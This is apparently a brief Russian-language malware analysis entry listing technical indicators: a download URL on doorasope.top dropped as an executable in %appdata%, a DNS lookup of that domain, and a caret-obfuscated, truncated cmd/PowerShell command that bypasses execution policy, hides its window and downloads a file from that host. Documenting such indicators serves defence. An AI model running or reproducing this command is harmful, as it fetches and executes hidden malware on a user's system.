Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwERsH^elL.^exe ^-Ex^ECutIo^NpOlI^c^Y^ BYp^ass -^n^oPRo^FI^L^e -wIND^o^W^stYl^E^ hi^DDeN ^(Ne^W-^oB^J^ec^T^ s^Ys^t^EM^.^Net^.^we^BcLI^en^t).^d^OWnLOaD^fiLE('http://www.doorasope.top...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^OwERsH^elL.^exe ^-Ex^ECutIo^NpOlI^c^Y^ BYp^ass -^n^oPRo^FI^L^e -wIND^o^W^stYl^E^ hi^DDeN ^(Ne^W-^oB^J^ec^T^ s^Ys^t^EM^.^Net^.^we^BcLI^en^t).^d^OWnLOaD^fiLE('http://www.doorasope.top...' (со скрытым окном)